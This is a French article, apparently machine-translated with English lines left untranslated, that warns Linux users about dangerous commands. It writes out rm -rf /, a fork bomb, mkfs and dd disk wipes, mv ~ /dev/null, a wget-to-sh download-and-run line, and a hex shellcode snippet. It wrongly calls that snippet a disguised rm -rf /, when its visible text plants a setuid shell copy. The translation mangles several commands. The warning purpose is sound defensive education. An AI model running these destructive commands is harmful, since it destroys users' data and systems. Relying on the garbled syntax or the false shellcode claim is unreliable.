L’apprentissage des commandes que vous ne devriez pas exécuter peut vous aider à vous protéger des trolls tout en vous permettant de mieux comprendre le fonctionnement de Linux. Ce n’est pas un guide exhaustif et les commandes peuvent être remixées de différentes façons.
Notez que beaucoup de ces commandes ne seront dangereuses que si elles sont préfixées par sudo sur Ubuntu - ils ne fonctionneront pas autrement. Sur d'autres distributions Linux, la plupart des commandes doivent être exécutées en tant que root.
rm -rf / - Supprime tout!
La commande rm -rf / supprime tout ce qui est possible, y compris des fichiers sur votre disque dur et des fichiers sur des périphériques amovibles connectés. Cette commande est plus compréhensible si elle est décomposée:
rm – Remove the following files.
- rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.
/ – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.
Linux va volontiers obéir à cette commande et tout supprimer sans vous y inviter, soyez donc prudent lorsque vous l'utilisez! La commande rm peut également être utilisée de manière dangereuse - rm –rf ~ supprimerait tous les fichiers de votre dossier personnel, rm -rf. * supprimerait tous vos fichiers de configuration.
La leçon: Attention rm -rf.
Rm déguisé / rf /
Voici un autre extrait de code présent sur le Web:
char esp _attribute_ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68” “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99” “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7” “x56x04xf7x56x08xf7x56x0cx83xc4x74x56” “x8dx73x08x56x53x54x59xb0x0bxcdx80x31” “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69” “x6ex2fx73x68x00x2dx63x00” “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Ceci est la version hexagonale de rm –rf / – L'exécution de cette commande effacerait vos fichiers comme si vous aviez exécuté rm –rf /.
La leçon: Ne lancez pas de commandes bizarres, visiblement déguisées, que vous ne comprenez pas.
: () {: |: &};: - Fork Bomb
La ligne suivante est une fonction bash simple mais dangereuse:
:(){:|: &};:
Cette ligne courte définit une fonction shell qui crée de nouvelles copies de elle-même. Le processus se réplique continuellement et ses copies se répliquent continuellement, prenant rapidement tout votre temps processeur et votre mémoire. Cela peut geler votre ordinateur. Il s’agit essentiellement d’une attaque par déni de service.
La leçon: Les fonctions Bash sont puissantes, même très courtes.
mkfs.ext4 / dev / sda1 - Formate un disque dur
le mkfs.ext4 / dev / sda1La commande est simple à comprendre:
mkfs.ext4 – Create a new ext4 file system on the following device.
/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.
Pris ensemble, cette commande peut être équivalente à l'exécution du format c: sous Windows. Elle efface les fichiers de votre première partition et les remplace par un nouveau système de fichiers.
Cette commande peut également prendre d’autres formes - mkfs.ext3 / dev / sdb2 formaterait la deuxième partition sur le deuxième disque dur avec le système de fichiers ext3.
La leçon: Attention aux commandes en cours d'exécution directement sur les unités de disque dur commençant par / dev / sd.
commande> / dev / sda - Écrit directement sur un disque dur
le commande> / dev / sda line fonctionne de la même manière: il exécute une commande et envoie le résultat de cette commande directement sur votre premier disque dur, en écrivant les données directement sur le lecteur de disque dur et en endommageant votre système de fichiers.
command – Run a command (can be any command.)
> – Send the output of the command to the following location.
/dev/sda – Write the output of the command directly to the hard disk device.
La leçon: Comme ci-dessus, méfiez-vous des commandes en cours d'exécution impliquant des unités de disque dur commençant par / dev / sd.
dd if = / dev / random of = / dev / sda - Écrit un message indésirable sur un disque dur
le dd si = / dev / aléatoire de = / dev / sda La ligne effacera également les données sur l’un de vos disques durs.
dd – Perform low-level copying from one location to another.
if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).
of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.
La leçon: dd copie les données d’un emplacement à un autre, ce qui peut être dangereux si vous copiez directement sur un périphérique.
mv ~ / dev / null - Déplace votre répertoire personnel vers un trou noir
/ dev / null est un autre emplacement spécial - déplacer quelque chose dans / dev / null revient à le détruire. Pensez à / dev / null comme à un trou noir. Essentiellement, mv ~ / dev / null envoie tous vos fichiers personnels dans un trou noir.
mv – Move the following file or directory to another location.
~ – Represents your entire home folder.
/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.
La leçon: Le caractère ~ représente votre dossier personnel et le déplacement de vos éléments dans / dev / null les détruit.
wget https://example.com/something -O - | sh - Télécharge et exécute un script
La ligne ci-dessus télécharge un script à partir du Web et l’envoie à sh, qui exécute le contenu du script. Cela peut être dangereux si vous n'êtes pas sûr du contenu du script ou si vous ne faites pas confiance à son source - n'exécutez pas de scripts non fiables.
wget – Downloads a file. (You may also see curl in place of wget.)
https://example.com/something – Download the file from this location.
| – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.
sh – Send the file to the sh command, which executes it if it’s a bash script.
La leçon: Ne téléchargez pas et n’exécutez pas de scripts non fiables à partir du Web, même avec une commande.
Connaissez-vous d’autres commandes dangereuses que les nouveaux utilisateurs (et les utilisateurs expérimentés) de Linux ne devraient pas exécuter? Laissez un commentaire et partagez-les!
